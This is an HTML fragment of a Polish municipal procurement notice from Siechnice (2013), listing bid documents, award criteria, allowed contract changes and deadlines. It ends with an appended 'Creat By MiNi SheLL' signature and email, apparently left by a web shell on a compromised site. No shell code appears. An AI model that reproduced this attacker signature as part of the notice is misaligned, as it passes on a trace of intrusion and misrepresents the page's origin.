c)dokumenty wymienione w pkt 6.3, 6.4, 6.5, 6.6 i 6.7 specyfikacji istotnych warunków zamówienia muszą potwierdzać spełnienie warunków szczegółowych łącznie przez Wykonawców składających wspólnie ofertę.

6)pełnomocnictwo dla podmiotów występujących wspólnie (konsorcjum, spółka cywilna), jeżeli zaistnieje taka sytuacja, zgodnie z art. 23  ustawy Prawo zamówień publicznych. W razie wyboru oferty podmiotów występujących wspólnie, Zamawiający zażąda przed zawarciem umowy - stosownie do art. 23 ust. 4 - umowy regulującej współpracę tych podmiotów. Oferta konsorcjum musi spełniać następujące wymagania - zawierać odrębne i niezależne dla każdego uczestnika konsorcjum wszystkie dokumenty i oświadczenia wymienione powyżej, podpisana w taki sposób, by zobowiązywała prawnie wszystkie strony -  to znaczy podpisana przez przedstawiciela konsorcjum, którego upoważnienie do złożenia oferty wynika z dołączonego pełnomocnictwa, udzielonego przez upoważnionych przedstawicieli członków konsorcjum

7)pełnomocnictwo dla osoby podpisującej ofertę i inne dokumenty w imieniu wykonawcy, jeżeli jest to osoba nie wykazana w rejestrze

8)Zaakceptowane istotne postanowienia umowy - druki w załączeniu (Załącznik nr 6 do specyfikacji istotnych warunków zamówienia - Istotne warunki umowy)

9)kosztorys ofertowy opracowany na podstawie przedmiarów, stanowiących załącznik nr 10 do specyfikacji istotnych warunków zamówienia. Przedmiar ten stanowi jedynie informację o charakterze pomocniczym, który wykonawca może wykorzystać wraz z informacjami zawartymi w dokumentacji technicznej do opracowania własnego przedmiaru. Przedmiar wykonawcy będzie podstawą do ustalania cen jednostkowych robót lub jednostkowych nakładów rzeczowych niezbędnych do wykonania robót stanowiących przedmiot zamówienia oraz oszacowania ceny oferty poprzez sporządzenie kalkulacji w ramach kosztorysu ofertowego uproszczonego. Nie złożenie przez Wykonawcę kosztorysu ofertowego spowoduje odrzucenie oferty przez Zamawiającego.

10)Wypełniony harmonogram rzeczowo-finansowy realizacji oraz finansowania przedmiotu zamówienia, którego wzór stanowi załącznik nr 14 do specyfikacji istotnych warunków zamówienia jednocześnie stanowiący załącznik do oferty Wykonawcy i jej integralną część musi uwzględniać wymagane informacje (etapy, czasokresy, zaangażowanie procentowe i informacje zawarte w specyfikacji istotnych warunków zamówienia) z wyodrębnieniem zakresów powierzonych podwykonawcom. Zamawiający zastrzega sobie prawo do zmiany etapów wskazanych w harmonogramie przed podpisaniem umowy lub w toku realizacji zgodnie z jej postanowieniami. Nie złożenie przez Wykonawcę harmonogramu spowoduje odrzucenie oferty przez Zamawiającego.

11) Wypełnionego druku oferty - zgodnie ze wzorem stanowiącym załącznik
nr 1 do SIWZ - wzór oferty. Cena zawarta w ofercie musi uwzględniać wszystkie prace wynikające z dokumentacji i z wizji w terenie</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza nieistotne zmiany w umowie oraz inne zmiany postanowień zawartych w istotnych
postanowieniach umowy, które Zamawiający przewidział w ogłoszeniu, specyfikacji istotnych warunków
zamówienia lub istotnych warunkach umowy, stanowiących załącznik nr 6 do specyfikacji istotnych
warunków umowy. 1. Zamawiający dopuszcza możliwość przerwania świadczenia prac nie z winy
Wykonawcy, których nie można było przewidzieć lub którym skutkom nie można było zapobiec, pomimo
dołożenia przez Wykonawcę najwyższej staranności (np.: klęska żywiołowa i inne). Zamawiający
dopuszcza zmianę terminu realizacji umowy w przypadku wystąpienia okoliczności niezależnych od
Wykonawcy skutkujących niemożliwością dotrzymania terminu określonego w Umowie, termin ten może
ulec przedłużeniu, nie dłużej jednak niż o czas trwania tych okoliczności. 2.Zamawiający dopuszcza
zmianę przedstawicieli stron umowy. 3.Zamawiający dopuszcza zmianę kierownika budowy,
przedstawionego w ofercie, jedynie za uprzednią pisemną zgodą Zamawiającego, akceptując nowego
kierownika budowy, w przypadku, gdy: 1)Wykonawca z własnej inicjatywy proponuje zmianę w
następujących przypadkach: a)śmierci, choroby lub innych zdarzeń losowych dotyczących kierownika
budowy/kierowników robót branżowych, b)nie wywiązywania się kierownika budowy/kierowników robót
branżowych z obowiązków wynikających z umowy, 2)jeżeli zmiana kierownika budowy/kierowników robót
branżowych stanie się konieczna z jakichkolwiek przyczyn niezależnych od Wykonawcy (np. rezygnacji).
4.Zamawiający może zażądać od wykonawcy zmiany kierownika budowy/kierowników branżowych, jeżeli
uzna, że nie wykonuje on swoich obowiązków wynikających z umowy. Wykonawca zobowiązany jest
zmienić kierownika budowy zgodnie z żądaniem Zamawiającego we wskazanym przez Zamawiającego
terminie. 5.W przypadku zmiany kierownika budowy/kierowników branżowych nowa osoba musi spełniać
wymagania określone w SIWZ dla danego specjalisty. 6.Zamawiający dopuszcza możliwość zmiany
sposobu rozliczania umowy lub dokonywania płatności. 7.Zamawiający dopuszcza możliwość zmiany
stawki podatku VAT w przypadku zmiany przepisów dotyczących podatku VAT. 8.Zamawiający zastrzega
sobie prawo zmniejszenia lub zwiększenia zakresu zadania. Zmiany będą dotyczyły tylko zakresu, który
wyniknie w trakcie realizacji zadania a będzie niezbędny do właściwego zakończenia podstawowego
zamówienia. 9.Zamawiający dopuszcza możliwość zmiany podwykonawców: w przypadku wprowadzenia podwykonawcy, wprowadzenia nowego (kolejnego) podwykonawcy, rezygnacji podwykonawcy, zmiany
wartości lub zakresu robót wykonywanych przez podwykonawcę, Zamawiający może wyrazić zgodę na
powyższe po zaakceptowaniu umowy Wykonawcy z podwykonawcą wraz z częścią dokumentacji dot.
wykonania robót określonych w umowie, w terminie 14 dni od przekazania umowy przez Wykonawcę.
10.Zamawiający dopuszcza możliwość zmiany koordynatora na pisemną prośbę Wykonawcy lub
Zamawiającego. Po otrzymaniu pisemnej prośby dot. zmiany koordynatora określonego w umowie, w
terminie 14 dni od przekazania, Zamawiający może wyrazić zgodę na powyższe.. 11.Zmiany na skutek
wydanych decyzji, uzgodnień, faktycznych uwarunkowań terenowych i gruntowych, powodujących
konieczność modyfikacji rozwiązań. 12.Innych sytuacji, których nie można było przewidzieć w chwili
zawarcia umowy i mających charakter zmian nieistotnych tj. nie odnoszących się do kwestii, które
podlegały ocenie podczas wyboru Wykonawcy i takich, które gdyby były znane w momencie wszczęcia
procedury mającej na celu wybór Wykonawcy, nie miałyby wpływu na udział większej ilości podmiotów
zainteresowanych tą procedurą. 13. Zamawiający dopuszcza zmianę terminu realizacji umowy lub
poszczególnych jej części (zleceń) o czas trwania poniższych okoliczności, w przypadku: 1)wystąpienia
okoliczności niezależnych od Wykonawcy skutkujących niemożliwością dotrzymania terminu określonego w
Umowie, termin ten może ulec przedłużeniu, nie dłużej jednak niż o czas trwania tych okoliczności, 2)
konieczności wprowadzenia zmian w dokumentacji projektowej, a wynikających z konieczności
dostosowania zakresu zadania do wytycznych programowych, powszechnie obowiązujących przepisów
prawa, wprowadzenia zmian w rozwiązaniach technicznych lub usunięcia wad w dostarczonej
dokumentacji projektowej, 3)nie przekazania przez Zamawiającego terenu budowy w terminie określonym
w umowie, 4)opóźnień Zamawiającego w przekazaniu Wykonawcy dokumentów budowy (pozwolenia na
budowę, dokumentacji projektowej, specyfikacji technicznych, innych wymaganych przepisami, do których
przekazania Zamawiający był zobowiązany), 5)przerwy w robotach spowodowanej wystąpieniem znalezisk
archeologicznych lub innych znalezisk czy wykopalisk, uniemożliwiających wykonywanie robót, 6)
wstrzymania przez Zamawiającego wykonywanie robót, 7)działania siły wyższej w rozumieniu przepisów
Kodeksu cywilnego lub 8)opóźnień związanych z uzyskiwaniem przez Wykonawcę niezbędnych w myśl
ustawy Prawo budowlane dokumentów lub 9)innych okoliczności nie powstałych z winy Wykonawcy lub 10)
wystąpienia robót dodatkowych, nie objętych zamówieniem podstawowym, niezbędnych do jego
prawidłowego wykonania, których wykonanie stało się konieczne na skutek sytuacji niemożliwej wcześniej
do przewidzenia, jeżeli: a)z przyczyn technicznych lub gospodarczych oddzielenie zamówienia
dodatkowego od zamówienia podstawowego wymagałoby poniesienia niewspółmiernie wysokich kosztów,
lub b)wykonanie zamówienia podstawowego jest uzależnione od wykonania zamówienia dodatkowego, a
wykonanie zamówienia dodatkowego uniemożliwia wykonanie zamówienia podstawowego a wykonanie
zamówienia dodatkowego uniemożliwia wykonanie zamówienia podstawowego w terminie umownym.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.siechnice.dolnyslask.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w
Siechnicach, ul. Jana Pawła II 12, 55-011 Siechnice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.08.2013 godzina 11:30, miejsce: Urząd Miejski w Siechnicach, ul. Jana Pawła II 12, 55-011 Siechnice, kancelaria -
parter budynku.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com